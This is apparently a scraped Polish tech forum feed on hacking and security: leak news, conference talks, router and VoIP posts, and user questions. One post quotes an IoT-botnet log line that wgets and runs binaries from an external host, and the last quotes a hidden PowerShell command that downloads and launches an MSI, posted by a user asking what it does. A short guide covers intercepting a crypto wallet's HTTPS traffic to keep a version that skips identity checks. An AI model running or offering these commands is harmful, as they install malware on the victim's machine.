Treść przeznaczona dla osób powyżej 18 roku życia...
Wszystko
Najnowsze
Archiwum
Wyciek danych ze strony z przepisami. Na celowniku użytkownicy Thermomiksa
Fakt, że wypłynąć może informacja o dodawaniu pizzy do ananasa, jest najmniejszym problemem w tym przypadku. Wprawdzie Vorwerk zapewnia, że najważniejsza informacja nie wpadła w ręce cyberprzestępców, ale i tak pozyskali cenne dane.
z- 23
- #
- #
- #
- #
- #
@marcomarco83838383: skąd pobrałeś spolszczenie?
@marcomarco83838383 jakim cudem przy podwójnym uwierzytelnieniu zmienił adres email/hasło?
Polskie projekty IT Security co słychać w LKRG (Linux Runtime Kernel Guard)
Rozmawiamy z Adamem "pi3" Zabrockim oraz Solar Designerem o LKRG (Linux Runtime Kernel Guard), które może znacznie utrudnić zhackowanie Linuxa. Co słychać i jak przebiega rozwój projektu, czy ktoś próbował skutecznie obejść LKRG? Zapraszamy do lektury! :)
z- 4
- #
- #
- #
- #
- #
- #
Co się stało z danymi #eurocert
Dane miały być opublikowane dzisiaj, na cebulkowej stronie grupy która dopuściła się kradzieży nie widać już wpisu odliczającego do publikacji, publikacji nie ma (a inne dane które miały zostać opublikowane dzisiaj już są do pobrania).
Przestraszyli się skali problemu i tego, że dotyka on raczej wysoko ustawionych w hierarchii społecznej ludzi (nie zwykły Kowalski) i się wycofali, czy #eurocert opłacił haracz?
#
Dane miały być opublikowane dzisiaj, na cebulkowej stronie grupy która dopuściła się kradzieży nie widać już wpisu odliczającego do publikacji, publikacji nie ma (a inne dane które miały zostać opublikowane dzisiaj już są do pobrania).
Przestraszyli się skali problemu i tego, że dotyka on raczej wysoko ustawionych w hierarchii społecznej ludzi (nie zwykły Kowalski) i się wycofali, czy #eurocert opłacił haracz?
#
Wyrywałem sobie włosy przez kilka literek
Zamiast res.set("Content-Type", "application/xml"); musiałem zmienić na res.set("Content-Type", "text/xml");
To technologia z lat 2007
Ale teraz działa <3 Skoro wiem już jak ustawić MIME, ale to też ich wina, nikt w dokumentacji nie napisał, że musi być text/xml!
Zamiast res.set("Content-Type", "application/xml"); musiałem zmienić na res.set("Content-Type", "text/xml");
To technologia z lat 2007
Ale teraz działa <3 Skoro wiem już jak ustawić MIME, ale to też ich wina, nikt w dokumentacji nie napisał, że musi być text/xml!
źródło: 2025-01-24-15-03-37-037
Pobierz
Właśnie stawiam serwisy na Cisco 7942G, i właśnie przez skórę czuje nostalgie jak dawniej było prosto gdzież się włamać nawet tak dla zabawy.
Mój openssh nawet nie chce się połączyć przez ssh z telefonem, bo jest za stary xD
Nawet to nie działa:
Host ciscodevice
Hostname
Mój openssh nawet nie chce się połączyć przez ssh z telefonem, bo jest za stary xD
Nawet to nie działa:
Host ciscodevice
Hostname
@aptitude: w sumie szkoda, że nie ma 3 linii, bo przydałaby się do testów, bo teraz na pierwszej mam sip.sdf.org a na drugiej dus.net, a chciałbym dodać trzecią ale nie obsługuje, jak chce coś testować usuwam dus.net i zamieniam na własny serwer SIP. Bo na dus.net mogę tylko dzwonić i to dosłownie na każdy numer i to kosztuje tylko centy. Ale nie mam własnego numeru jak na sdf, na sdf
Nawet nowy firmware bez pytania oO Jak widać dawniej nie trzymali się bezpieczeństwa xD
@aptitude: Nic się nie zmieniło xd
Uruchomienie starej wersji aplikacji Kanga Wallet
Ten poradnik pozwala nadal używać wersji aplikacji Kanga Wallet, która nie pyta o KYC. Działa on na Androdzie 6 lub starszym, gdzie nie trzeba rootować telefonu, aby podsłuchać szyfrowaną komunikację HTTPS. Nowszymi wersjami zajmę się później.
1. Instalujemy PCAPdroid
2. Instalujemy PCAPdroid-mitm
3. adb shell
Ten poradnik pozwala nadal używać wersji aplikacji Kanga Wallet, która nie pyta o KYC. Działa on na Androdzie 6 lub starszym, gdzie nie trzeba rootować telefonu, aby podsłuchać szyfrowaną komunikację HTTPS. Nowszymi wersjami zajmę się później.
1. Instalujemy PCAPdroid
2. Instalujemy PCAPdroid-mitm
3. adb shell
Czy jeżeli giełda dojdzie do tego, że handlujesz bez KYC, to nie zablokuje ci środków?
@kamil-wasniewski: Dobre pytanie. Zgodnie z oficjalnym stanowiskiem Kangi można legalne handlować bez KYC spoza krajów EOG, czyli możesz połączyć się przez VPN np. z Ukrainy i aplikacja nie powinna zapytać o KYC.
Poradnik dotyczy możliwości dalszego korzystania ze starszej wersji aplikacji (jeśli ktoś nie aktualizuje).
Sprawdziłem z Proton VPN, działa. Nie pyta o KYC :)
Przyszło mi powiadomienie od facebooka odnośnie nieznanego logowania, a sesja wygasła(w tym samym czasie jak straciłam internet w telefonie) Pierwszy raz taka sytuacja. Hasło od razu zmienione, wylogowane ze wszystkiego i dwustopniowa weryfikacja, email też zmieniony. Czy to możliwe, że to fałszywy alarm i facebook się rypnął z lokalizacją? I czy zrobić coś jeszcze, czy już jest safe? I w dzienniku aktywności było kilka razy wyszukiwane moje imię i nazwisko :/ #
źródło: image
Pobierz
Orange wykonało mi przyłączę pod usługe internet 8gbps w technologii XGSPON, dostałem Funbox10, który jest bardzo duży i bardzo biedny, nic ciekawego w nim nie można ustawić, do tego jakieś eko-sreko powoduje że się usypia...i rozłącza net 😕
Przyjdzie pora na jego zastąpienie wkładką SFP+ lub mniejszym ONT 😃
https://www.youtube.com/shorts/N4ebbe_Bi0k
#siecikomputerowe #internet #orange #netia #hacking
Przyjdzie pora na jego zastąpienie wkładką SFP+ lub mniejszym ONT 😃
https://www.youtube.com/shorts/N4ebbe_Bi0k
#siecikomputerowe #internet #orange #netia #hacking
do tego jakieś eko-sreko powoduje że się usypia
@Pan_Slon: dziwne ze hakier ktory tak bardzo rozwija branze nie doszedl do tego, ze mozna to wlasnorecznie wylaczyc.
Newag - Wczoraj odbyła się kolejna rozprawa.
Komedii ciąg dalszy. 15 stycznia kolejna rozprawa w sprawie pociągów Newag, gdzie producent odwraca kota ogonem. Pośmiejmy się razem. Polecam 19:06 - angielski wymagany
z- 58
- #
- #
- #
- #
- #
- #
Treść przeznaczona dla osób powyżej 18 roku życia...
@Ramadamadingdong: Wszystkie takie ogłoszenia to scam i stracisz jeszcze więcej niż tylko konto na fb.
@Ramadamadingdong: To konto Ci skradziono bo popełniłeś jakiś błąd. Obecny właściciel go nie popełni i żaden hacker nic nie zrobi. Słabo zabezpieczyłeś, albo wlazłeś w linka phishingowego.
To może być największy wyciek w historii. Rosjanie wykradli lokalizację milionów
Jedna z największych firm zajmujących się śledzeniem lokalizacji użytkowników za pomocą danych ze smartfonów, Gravy Anal
z- 18
- #
- #
- #
- #
- #
Ogromny atak na dodatki do Google Chrome. Zagrożonych ponad 30 rozszerzeń
Badacze cyberbezpieczeństwa odkryli duży atak phishingowy wymierzony w rozszerzenia dostępne w Chrome Web Store, który miał miejsce podczas świąt Bożego Narodzenia. Kampania dotyczyła ponad 30 dodatków, a zagrożonych było około 2,6 miliona urządzeń.
z- 2
- #
- #
- #
- #
- #
- #
Treść przeznaczona dla osób powyżej 18 roku życia...
Treść przeznaczona dla osób powyżej 18 roku życia...
@Frwrd05: wszystko i nic bo nic konkretnego nie napisałeś ograniczeniem nie jest brak fantazji i wyobraźni do p---------a.. ograniczeniem są możliwości inżynieryjne takie możliwości jakie są obecnie to najlepsze jakie mamy.. to co opisałeś już jest w pewnym sensie a w pewnym będzie a w pewnym nie ma przełóż to na język techniczny konkretnie bo nie wiadomo zupełnie o czym w ogóle piszesz
Świetny talk z 38C3 na temat odzyskania kontroli nad cubesatem utraconym 10 lat temu. Jeden ze studentów zdiagnozował co było przyczyną awarii a następnie rozkminił jak shackować oprogramowanie tak, żeby przywrócić kontrolę.
https://media.ccc.de/v/38c3-hacking-yourself-a-satellite-recovering-beesat-1#l=eng
#kosmos #hacking
https://media.ccc.de/v/38c3-hacking-yourself-a-satellite-recovering-beesat-1#l=eng
#kosmos #hacking
postawiłem na WSL http.server w pythonie i wypluł mi on w pewnym momencie taki oto log:
zastanawiam się jakim cudem był on otwarty na świat skoro mam wewnętrzne IP? Mój ISP to mała, osiedlowa firemka i byłem zawsze pewny, że nic ode mnie nie ma prawa nasłuchiwać po drugiej stronie ISPowego switcha, który zapewne jest gdzieś w piwnicy (ale słabo znam się na sieciach).
Moja
172.20.4x.x - - [30/Dec/2024 18:30:21] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+njvwa4+dbda7;wget+http:/\/fniew.eye-network.ru/dbda7;chmod+777+dbda7;./dbda7+jaws;rm+-rf+dbda7;wget+http:/\/fniew.eye-network.ru/wheiuwa4;chmod+777+wheiuwa4;./wheiuwa4+jaws;rm+-rf+wheiuwa4 HTTP/1.1" 404 -
zastanawiam się jakim cudem był on otwarty na świat skoro mam wewnętrzne IP? Mój ISP to mała, osiedlowa firemka i byłem zawsze pewny, że nic ode mnie nie ma prawa nasłuchiwać po drugiej stronie ISPowego switcha, który zapewne jest gdzieś w piwnicy (ale słabo znam się na sieciach).
Moja
@klamkaodokna:
172.20 to nadal wewnętrzna adresacja. Masz podgląd do konfiguracji na głównym routerze? Obstawiam że maska 24 albo i więcej i wszyscy się widzą wzajemnie.
ISP upchał wielu klientów w 1 podsieci żeby zaoszczędzić na adresacji.
172.20 to nadal wewnętrzna adresacja. Masz podgląd do konfiguracji na głównym routerze? Obstawiam że maska 24 albo i więcej i wszyscy się widzą wzajemnie.
ISP upchał wielu klientów w 1 podsieci żeby zaoszczędzić na adresacji.
@klamkaodokna: sforwardowales ze swojego routera na to więc jest widoczne dla innych w twojej sieci lokalnej, więc to jakiś sąsiad. Znając życie to sąsiad ma jakiś malware który sobie skanuje
Dragon Sector: life after the Newag DRM disclosure
Nagranie z konferencji 37C3, gdzie członkowie Dragon Sector odpowiedzialni za odkrycia w pociągach Newagu opowiadają ciąg dalszy historii.
z- 67
- #
- #
- #
- #
- #
- #
źródło: 1000010541
Pobierz
@Archimond5: jeszcze piwa w prawej ręce brakuje i essa B)
@Archimond5: to fake jest. zdjęcie stare, pamiętam je, było tam co innego, a ktoś wkelił obraz z wykopu.
Stalowy menedżer haseł i kodów odzyskiwania (ang. backup codes)
Zrób to sam i bez większych kosztów.
z- 2
- #
- #
- #
- #
- #
- #
cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\users\public\3aw.msi'; Invoke-RestMethod -Uri 'https://cośtam.short.gy/1' -OutFile $path; Start-Process $path;Adres w kodzie powyżej zmieniłem, żeby nikt się nie naciął. Oczywiście nic nie wklejam, ale jestem ciekaw co to polecenie zrobi.
Pomożecie rozszyfrować?
#hacking #wirus
źródło: Zrzut ekranu 2025-02-10 210023
Pobierz